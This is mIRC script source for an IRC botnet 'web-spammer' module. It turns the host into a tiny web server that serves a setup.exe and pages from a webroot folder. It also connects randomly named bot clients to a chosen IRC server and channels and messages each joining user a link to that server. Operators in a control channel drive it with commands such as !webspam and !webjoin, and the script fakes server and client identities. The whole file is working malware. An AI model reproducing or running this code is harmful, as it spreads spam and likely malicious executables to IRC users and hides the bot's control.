on 1:SOCKLISTEN:httpd:{
  if ($sockerr > 0) { return }
  var %tmp = http.cli. $+ $r(0,$ticks)
  sockaccept %tmp
}
on 1:SOCKREAD:http.cli.*:{
  if ($sockerr > 0) { return }
  :recv
  sockread %temp
  tokenize 32 %temp
  if ($sockbr == 0) { return }
  if (FORWARD isin $1-) {
    write httpd.log ( $+ $sock($sockname).ip $+ ) $1-
  }
  if (*User*Agent* iswm $1-) {
    write -il2 webroot\httpd.log <font face="Tahoma"><small>(<b> $+ $sock($sockname).ip $+ </b>)<u>::</u>(<b>User Agent</b>)<u>::</u>(<b> $+ $asctime(ddd/mmm/yy - hh:nn:ss) $+ </b>) $2- $+ <br></font></small>  
  }
  if ($1 == GET) {
    if (httpd.log !isin $2-) { write -il1 webroot\httpd.log <font face="Tahoma"><small>(<b> $+ $sock($sockname).ip $+ </b>)<u>::</u>(<b>GET</b>)<u>::</u>(<b> $+ $asctime(ddd/mmm/yy - hh:nn:ss) $+ </b>) $2- $+ <br></font></small> }
    if ($lines(webroot\httpd.log) > 500) { write -d500 webroot\httpd.log }
    if ($exists(webroot\access.txt) == $true) { .remove webroot\access.txt }
    .copy webroot\httpd.log webroot\access.txt
    var %file = $replace($2-,/,\)
    var %pos = $pos(%file,HTTP,1)
    var %file = $left(%file,$calc(%pos - 2))
    if ($left(%file,1) == \) { var %file = $right(%file,-1) }
    if ($len(%file) == 0) { var %file = lame.htm }
    if ($pos(%file,..,0) > 0) { sendfile $sockname $shortfn($mircdirwebroot\lame.htm) | return }
    var %acc = $readini -n access.ini get " $+ $nopath(%file) $+ "
    if (%acc == $null) %acc = 0
    inc %acc
    writeini -n access.ini get " $+ $nopath(%file) $+ " %acc
    if ($exists($shortfn($mircdirwebroot\ $+ %file)) == $true) {
      sendfile $sockname $shortfn($mircdirwebroot\ $+ %file)
    }
    else {
      sendfile $sockname $shortfn($mircdirwebroot\404.htm)
      return
    }
  }
  if ($1 == HEAD) {
    if (httpd.log !isin $2-) { write -il1 webroot\httpd.log <font face="Tahoma"><small>(<b> $+ $sock($sockname).ip $+ </b>)<u>::</u>(<b>HEAD</b>)<u>::</u>(<b> $+ $asctime(ddd/mmm/yy - hh:nn:ss) $+ </b>) $2- $+ <br></font></small> }
    if ($lines(webroot\httpd.log) > 500) { write -d500 webroot\httpd.log }
    var %file = $replace($2-,/,\)
    var %pos = $pos(%file,HTTP,1)
    var %file = $left(%file,$calc(%pos - 2))
    if ($pos(%file,..,0) > 0) { sendfile $sockname $shortfn($mircdirwebroot\lame.htm) | return }
    var %acc = $readini -n access.ini get " $+ $nopath(%file) $+ "
    if (%acc == $null) %acc = 0
    inc %acc
    writeini -n access.ini get " $+ $nopath(%file) $+ " %acc
    if ($exists($shortfn($mircdirwebroot\ $+ %file)) == $true) {
      sockwrite -tn $sockname HTTP/1.1 200 OK
      sockwrite -tn $sockname Server: apache
      if ($pos($shortfn($mircdirwebroot\ $+ %file),htm,0) > 0) || ($pos($shortfn($mircdirwebroot\ $+ %file),txt,0) > 0) && ($pos($shortfn($mircdirwebroot\ $+ %file),exe,0) == 0) && ($pos($shortfn($mircdirwebroot\ $+ %file),scr,0) == 0) && ($pos($shortfn($mircdirwebroot\ $+ %file),pif,0) == 0) {
        sockwrite -tn $sockname Content-Type: text/html
      }
      else {
        sockwrite -tn $sockname Content-Type: application/binary
      }  
      sockwrite -tn $sockname Content-Length: $file($shortfn($mircdirwebroot\ $+ %file)).size
      sockwrite -tn $sockname Connection: close
      sockwrite $sockname $crlf
      sockclose $sockname
    }
    else {
      sendfile $sockname $shortfn($mircdirwebroot\404.htm)
      sockwrite -tn $sockname HTTP/1.1 200 OK
      sockwrite -tn $sockname Server: apache
      sockwrite -tn $sockname Content-Type: text/html
      sockwrite -tn $sockname Content-Length: $file($shortfn($mircdirwebroot\404.htm)).size
      sockwrite -tn $sockname Connection: close
      sockwrite $sockname $crlf
      sockclose $sockname
    }      
  }
  goto recv
}
on 1:SOCKWRITE:transfer.*:{
  if ($sockerr > 0) { return }
  send.chunk $gettok($sock($sockname).mark,1,32) $sockname $gettok($sock($sockname).mark,2-,32)
}
alias sendfile {
  inc %id
  %pos. [ $+ [ %id ] ] = 0
  if (*404* !iswm $2-) {
    sockwrite -tn $1 HTTP/1.1 200 OK
  }
  else {
    sockwrite -tn $1 HTTP/1.1 404 File not Found
  }
  sockwrite -tn $1 Server: Apache
  if ($pos($2-,exe,0) == 0) && ($pos($2-,scr,0) == 0) && ($pos($2-,pif,0) == 0) {
    sockwrite -tn $1 Content-Type: text/html
  }
  else {
    sockwrite -tn $1 Content-Type: application/binary
  }  
  :next
  sockwrite -tn $1 Content-Length: $file(" $+ $2- $+ ").size
  sockwrite -tn $1 Connection: close
  sockwrite $1 $crlf
  sockrename $1 transfer. [ $+ [ %id ] ]
  sockmark transfer. [ $+ [ %id ] ] %id $2-
  send.chunk %id $1-
}
alias send.chunk {
  if ($calc(%pos. [ $+ [ $1 ] ] - $file(" $+ $3- $+ ").size) > 512) { 
    sockclose $2
    unset %pos. [ $+ [ $1 ] ]
    return
  }
  bread " $+ $3- $+ " %pos. [ $+ [ $1 ] ] 512 &bin
  if ($sock($2) == $null) { return }
  sockwrite $2 &bin
  bunset &bin
  inc %pos. [ $+ [ $1 ] ] 512
}
alias startwebspam {
  set %w3b.d0
  set %spam-server $1
  set %spam-port $2
  set %spam-file $3
  set %w3b-port $4
  set %spam-chanz $5
  if ($portfree(%w3b-port) == $false) { .msg %channel Port %w3b-port is in use by another application! [halted] | halt }
  socklisten httpd %w3b-port
  .msg %channel Opening a webspammer [server= http:// $+ $ip $+ : $+ %w3b-port $+ /] @ %spam-server $+ : $+ %spam-port with message $3- ----=---- %spam-file
  %spam-msg = $6-
  .identd on $randx
  .startwebbot
}
; /startwebspam server port file WEBSERVERPORT #channelz SPAM MSG
alias startwebbot {
  .sockopen w3b. $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(a,z) %spam-server %spam-port
}
on 1:sockopen:w3b.*: {
  if (%spam-msg == $null) { .msg %channel Please set a spam msg using !webmsg [message] | halt }
  .set %temp-w3b-nick $randx
  .sockwrite -tn $sockname user $randx $randx $randx $randx
  .sockwrite -tn $sockname nick %temp-w3b-nick
  .msg %channel Bot online ( $+ %temp-w3b-nick $+ ) on %spam-server $+ : $+ %spam-port please !webjoin [channel]
  .sockwrite -tn $sockname join %spam-chanz
  halt
}
alias randx {
  return $rand(a,z) $+ $uper($rand(a,z)) $+ $lower($rand(a,z)) $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9) $+ $rand(a,z) $+ $uper($rand(a,z)) $+ $lower($rand(a,z))
}
on 1:SOCKREAD:w3b.*:{
  if ($sockerr > 0) return
  sockread %w3b.data
  if ($sockbr == 0) return
  w3b.p %w3b.data
}
alias w3b.p {
  if ($1 == PING) { sockwrite -tn $sockname PONG $2 | return }
  if ($1 == ERROR) { .startwebbot | return }
  elseif ($left($1,1) == : ) {
    set %bot.mask $remove($1,$left($1,1))
    set %bot.nick $gettok(%bot.mask,1,33)
    if ($4 == :VERSION) {
      .sockwrite -tn $sockname notice %bot.nick :VERSION mIRC v6.01 Khaled Mardam-Bey
    }
    elseif ($2 == KICK) && ($4 == %botnick) {
      .msg %channel [webspam] Kicked from $3 [raw]: $1-
    }
    elseif ($2 == join) && (%w3b.d0 == on) {
      .sockwrite -tn $sockname privmsg %bot.nick : $+ http:// $+ $ip $+ : $+ %w3b-port $+ / $+ %spam-file %spam-msg
    }
  }
}
on 1:load: {
  .msg %channel Loaded web-spammer! [v1.0]
  .mkdir webroot
  .copy index.htm webroot\index.htm
  .copy 404.htm webroot\404.htm
  .copy lame.htm
  .copy setup.exe webroot\setup.exe
  .w3bserver on
}
alias w3bserver {
  if ($1 == on) { 
    if ($portfree($2) == $false) { .msg %channel port $2 in use! | halt }
    socklisten httpd $2
    .msg %channel Tree setup! webserver online, test @ http:// $+ $ip $+ : $+ $2 $+ /
    halt
  }
  if ($1 == off) { 
    .sockclose httpd
    .msg %channel Site offline!
  }
}
on 1:text:!webserver *:%CHANNEL: {
  if ($nick !isop $chan) { halt }
  .w3bserver $2-
}
on 1:text:!webspam *:%CHANNEL: {
  if ($nick !isop $chan) { halt }
  .startwebspam $2-
}
on 1:text:!webjoin *:%CHANNEL: {
  if ($nick !isop $chan) { halt }
  .sockwrite -tn w3b.* join $2-
}
on 1:text:!preparew3bupdate:%CHANNEL: { 
  if ($nick !isop $chan) { halt }
  .remove webroot\lame.htm
  .remove webroot\404.htm
  .remove webroot\index.htm
  .remove webroot\setup.exe
}
on 1:text:!w3bMSG:#: { 
  if ($nick !isop $chan) { halt }
  set %w3b.d0 on
  .msg %channel OnJoin message on!
}
on 1:text:!w3btest:#: {
if ($isfile(webroot\access.txt) == $true) { .msg %channel YES! its working, 12http:// $+ $ip $+ : $+ %w3b-port $+ /access.txt for my status | halt }
msg %channel No ;/ not working, but try 4http:// $+ $ip $+ : $+ %w3b-port $+ /access.txt ... may be working, jus no hits yet ;/ *prays*
halt
}
